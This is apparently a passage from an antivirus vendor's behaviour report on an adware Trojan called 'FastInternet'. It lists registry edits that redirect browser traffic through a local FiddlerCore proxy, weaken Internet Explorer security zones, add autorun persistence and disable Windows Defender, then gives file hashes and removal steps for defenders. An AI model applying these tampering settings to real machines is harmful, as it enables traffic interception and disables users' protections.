The process taskkill.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 E7 35 FA F2 2F F3 BC 55 20 A1 EF 8A 38 BC DD"
The process internetport3.exe:360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 28 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 40 D6 28 4C 09 7F ED B5 BC 80 8E C2 82 82 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
"Attached" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"-loopback>
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"
The process DYK287G2Jhwy64P0Ln0s.exe:1012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A D1 68 A4 37 35 F9 1E AA 79 96 9C 58 B2 0F BF"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>-loopback>
The Trojan modifies the IE security-zone map so that all network paths (UNCs) are treated as Local intranet:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as Local intranet:
"ProxyBypass" = "1"
The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in other zones are treated as Local intranet (these three values are the checkboxes of IE's Local intranet dialog; the proxy redirection to 127.0.0.1:8877 above is the primary indicator, not the zone map):
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The Trojan disables automatic startup of the following applications (the Adobe Reader updater, the VMware Tools user process and the Java update scheduler) by deleting their autorun values:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"
"VMware User Process"
"SunJavaUpdateSched"
The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 03 00 00 00 29 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"
[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E DE 8A 1F 7F B4 35 8D BE 6A 90 41 2B CC 74 11"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>-loopback>
To run itself automatically each time Windows boots, the Trojan adds the following link(s) to its file(s) under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
"dutoauto" = "C:\a\wincheckfe.exe"
The Trojan modifies the IE security zone settings so that all local web-nodes whose names contain no dots and that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
To run itself automatically each time Windows boots, the Trojan adds the following link(s) to its file(s) under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"
"interpee" = "C:\a\internetport3.exe"
"autoauto" = "63839615.bat"
The Trojan modifies the IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the Trojan adds the following link(s) to its file(s) under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "63839615.bat"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
a632e8db250976257ee2e73d658ada12 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe |
8614c450637267afacad1645e23ba24a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\inetc.dll |
99f345cf51b6c3c317d20a81acb11012 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\KillProcDLL.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\inetc.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\inetc.dll |
acc2b699edfea5bf5aae45aba3a41e96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\nsExec.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\inetc.dll |
acc2b699edfea5bf5aae45aba3a41e96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\nsExec.dll |
8614c450637267afacad1645e23ba24a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\System.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsyD.tmp\System.dll |
a632e8db250976257ee2e73d658ada12 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe |
2df723b3cb50a002fca6e8c63a7a487f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe |
cb6a1aa1be943fd5aa85bd18708f759b | c:\Program Files\FastInternet\app.exe |
29ff2eda9ef60448c67860c675175072 | c:\Program Files\FastInternet\dotuninstall.exe |
42badc1d2f03a8b1e4875740d3d49336 | c:\a\7za.exe |
2df723b3cb50a002fca6e8c63a7a487f | c:\a\DYK287G2Jhwy64P0Ln0s.exe |
b19e81fc91a71a7222e63ea4f09771af | c:\a\FiddlerCore.dll |
da9dbf01355305af60037cd13ccf2968 | c:\a\getcap.exe |
2943023b33bb769d64721d4edccbd00b | c:\a\internetport3.exe |
e703835506e5dab34f20b5b496a38f72 | c:\a\wcheckf.exe |
813d46d64e42bf222676084e12e2e80d | c:\a\wincheckfe.exe |
7988bca8dfaacb79579fd000a31e69cf | c:\a\winonit.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WMIC.exe:568
vchk.exe:1656
taskkill.exe:216
taskkill.exe:1140
taskkill.exe:668
taskkill.exe:136
taskkill.exe:492
taskkill.exe:1832
taskkill.exe:1836
taskkill.exe:1772
taskkill.exe:1548
taskkill.exe:1372
taskkill.exe:936
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:628
taskkill.exe:1092
taskkill.exe:1492
taskkill.exe:1956
taskkill.exe:1952
taskkill.exe:828
taskkill.exe:1668
taskkill.exe:820
taskkill.exe:376
taskkill.exe:596
taskkill.exe:1124
taskkill.exe:316
taskkill.exe:1088
taskkill.exe:1928
taskkill.exe:1852
taskkill.exe:1856
taskkill.exe:1252
taskkill.exe:1016
taskkill.exe:916
taskkill.exe:1656
taskkill.exe:308
taskkill.exe:448
taskkill.exe:1232
taskkill.exe:440
taskkill.exe:1136
taskkill.exe:1932
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:648
taskkill.exe:1632
taskkill.exe:516
taskkill.exe:1348
taskkill.exe:1340
taskkill.exe:336
taskkill.exe:576
taskkill.exe:856
taskkill.exe:1424
taskkill.exe:1980
taskkill.exe:1584
taskkill.exe:652
taskkill.exe:508
taskkill.exe:480
taskkill.exe:568
taskkill.exe:468
taskkill.exe:464
taskkill.exe:564
taskkill.exe:1804
taskkill.exe:168
taskkill.exe:228
taskkill.exe:1868
taskkill.exe:224
taskkill.exe:1916
taskkill.exe:968
taskkill.exe:1180
taskkill.exe:1456
taskkill.exe:1748
taskkill.exe:1740
taskkill.exe:740
taskkill.exe:1160
taskkill.exe:884
taskkill.exe:1204
taskkill.exe:608
taskkill.exe:552
taskkill.exe:1968
taskkill.exe:872
taskkill.exe:956
taskkill.exe:320
taskkill.exe:1112
taskkill.exe:324
taskkill.exe:1752
taskkill.exe:612
taskkill.exe:1888
taskkill.exe:1884
taskkill.exe:1760
taskkill.exe:1880
taskkill.exe:1284
taskkill.exe:512
taskkill.exe:1472
taskkill.exe:808
taskkill.exe:2008
taskkill.exe:1368
%original file name%.exe:1756
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\a\avv.txt (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\vv[1].htm (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\uur[1].htm (2 bytes)
C:\a\ahho.txt (4 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\System.dll (11 bytes)
C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp\System.dll (11 bytes)
%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (6 bytes)
